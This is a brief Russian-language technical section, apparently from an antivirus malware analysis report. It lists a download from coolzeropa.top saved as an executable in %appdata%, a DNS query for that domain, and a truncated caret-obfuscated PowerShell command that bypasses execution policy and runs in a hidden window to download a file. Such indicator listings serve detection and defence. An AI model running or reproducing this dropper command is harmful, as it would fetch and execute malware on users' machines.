Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powe^Rshell.Ex^E^ -^E^XEcU^t^I^o^Np^oLicy b^ypaSS -^n^o^PRoFILe ^-wI^nD^oWsTyLE ^hI^dDe^n^ (^n^E^w^-ObJ^eC^t^ s^Y^st^EM^.NEt.^WEBclIEnt).downLO^adf^iLE(^'http://coolzerop...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "powe^Rshell.Ex^E^ -^E^XEcU^t^I^o^Np^oLicy b^ypaSS -^n^o^PRoFILe ^-wI^nD^oWsTyLE ^hI^dDe^n^ (^n^E^w^-ObJ^eC^t^ s^Y^st^EM^.NEt.^WEBclIEnt).downLO^adf^iLE(^'http://coolzerop...' (со скрытым окном)